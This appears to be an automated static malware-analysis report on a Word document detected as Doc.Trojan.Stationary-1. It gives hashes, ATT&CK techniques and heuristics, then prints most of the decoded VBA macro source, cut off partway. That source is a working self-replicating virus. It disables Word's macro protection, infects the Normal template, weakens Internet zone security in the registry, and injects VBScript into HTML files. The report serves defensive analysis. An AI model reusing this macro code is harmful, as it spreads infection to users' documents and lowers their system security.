Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 41fc2c700affb4bc…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 2000-07-18 04:07:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: c44960f47547e0476c20394b1815e429
SHA-1: dfd412db6c2747463e23eca9314ee3cb067fb003
SHA-256: 41fc2c700affb4bc853fcfe9262941ea7a89acbe4a1dd8bbbd4712221ea0e695
Risk score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro (`Document_Close`) that turns off Word's macro virus protection and save prompts, copies itself between the Normal template and the active document through `NormalTemplate.VBProject.VBComponents(1).CodeModule`, reads the stationery folder path from `HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\Stationery`, clears the `1201` value under `Internet Settings\Zones\0` in both HKCU and HKLM, and then appends a VBScript block to every `*.htm` file under that folder. The injected script references `CreateObject("Scripting.FileSystemObject")` and `GetObject`/`CreateObject("Word.Application")` to write the macro back into the Word Normal template. The ClamAV detection `Doc.Trojan.Stationary-1` matches a known malicious pattern. The primary intent appears to be spreading the macro through HTML files and the Normal template, while the Internet Settings changes lower zone security so the injected script is more likely to execute.

Heuristics (4)

  • ClamAV: Doc.Trojan.Stationary-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Stationary-1
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    Macro code calls CreateObject
  • GetObject call [high, OLE_VBA_GETOBJ]
    Macro code calls GetObject

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 22068 bytes
SHA-256: e7daa070d9f9a55c6204b2bf3a5e577868b122e5b2a9294fd5d1e0411387b3a8
Detection: ClamAV: Doc.Trojan.Stationary-1
Obfuscation or payload: unlikely

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Stationery
'by CyberShadow//SMF
Private Sub Document_Close()
 With Application
  .EnableCancelKey = False
  .ScreenUpdating = False
  .ShowVisualBasicEditor = False
 End With
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 If NT.Lines(1, 1) <> "'Stationery" Then
  NT.DeleteLines 1, NT.CountOfLines
  NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
 End If
 If AD.Lines(1, 1) <> "'Stationery" Then
  AD.DeleteLines 1, AD.CountOfLines
  AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
 End If
 CrStr = getname()
 Call compile(CryptedString, CrStr)
 Call CorrectLine(CryptedString, CrStr)
 a = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\Stationery", "Stationery Folder") + "\"
 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = ""
 System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "1201") = ""
 Call infectHTML(a, CryptedString, CrStr)
End Sub
Private Sub infectHTML(a, CryptedString, CrStr)
 With Application.FileSearch
  .FileName = "*.htm"
  .MatchAllWordForms = True
  .LookIn = a
  .SearchSubFolders = True
  .Execute
  For i = 1 To .FoundFiles.Count
   c = .FoundFiles(i)
   Open c For Input As 1
    If LOF(1) > 55000 Then GoTo ExitRead
    e = ""
    Do While Not EOF(1)
     Line Input #1, a2
     d = a2
     If Len(d) >= 3 Then
      b = UCase(d)
      If b = "<HTML> <CYBERSHADOW...>" Then GoTo ExitRead
      If b = "<HTML>" Then b = "<html> <CyberShadow...>": d = b
      For j = 1 To Len(b) - 6
       If Mid$(b, j, 8) = "</BODY>" Then
        d = Left$(b, j + 7) + Chr$(13) + Chr$(10)
        d = d + "<body>" + Chr$(13) + Chr$(10)
        d = d + "<script language=""VBScript"">" + Chr$(13) + Chr$(10)
        d = d + "<!--" + Chr$(13) + Chr$(10)
        d = d + "On Error Resume Next" + Chr$(13) + Chr$(10)
        d = d + CryptedString + Chr$(13) + Chr$(10)
        d = d + "Dim FSO" + Chr$(13) + Chr$(10)
        d = d + "Set FSO = CreateObject(""Scripting.FileSystemObject"")" + Chr$(13) + Chr$(10)
        d = d + "Set WordObj = GetObject("""", ""Word.Application""): Quit = 0" + Chr$(13) + Chr$(10)
        d = d + "If WordObj = """" Then" + Chr$(13) + Chr$(10)
        d = d + "Set WordObj = CreateObject(""Word.Application""): Quit = 1" + Chr$(13) + Chr$(10)
        d = d + "End If" + Chr$(13) + Chr$(10)
        d = d + "Set NT = WordObj.Templates(1).VBProject.VBComponents(1).Codemodule" + Chr$(13) + Chr$(10)
        d = d + "If NT.Lines(1, 1) <> ""'Stationery"" Then" + Chr$(13) + Chr$(10)
        d = d + "WordObj.Options.SaveNormalPrompt = False" + Chr$(13) + Chr$(10)
        d = d + "NT.DeleteLines 1, NT.CountOfLines" + Chr$(13) + Chr$(10)
        d = d + "NT.InsertLines 1," + CrStr + Chr$(13) + Chr$(10)
        d = d + "End If" + Chr$(13) + Chr$(10)
        d = d + "Set NT = Nothing" + Chr$(13) + Chr$(10)
        d = d + "If Quit = 1 Then WordObj.Quit" + Chr$(13) + Chr$(10)
        d = d + "--></script>" + Chr$(13) + Chr$(10)
        d = d + "</body>" + Chr$(13) + Chr$(10)
        j = j + 7
        If (Len(b) - j - 7) > 0 Then d = d + Right$(b, Len(b) - j - 7)
       End If
      Next
     End If
     e = e + d + Chr$(13) + Chr$(10)
    Loop
    Close #1
    Open c For Output As 1
     Print #1, e
ExitRead:
   Close #1
  Next i
 End With
End Sub
Private Sub CorrectLine(CryptedString, CrStr)
 maxlen = Int(Rnd * 100) + 100
 c = "": l = 0: f2 = -1
 For i = 1 To Len(CryptedString)
  b = Mid$(CryptedString, i, 1)
  If b = """" The
... (truncated)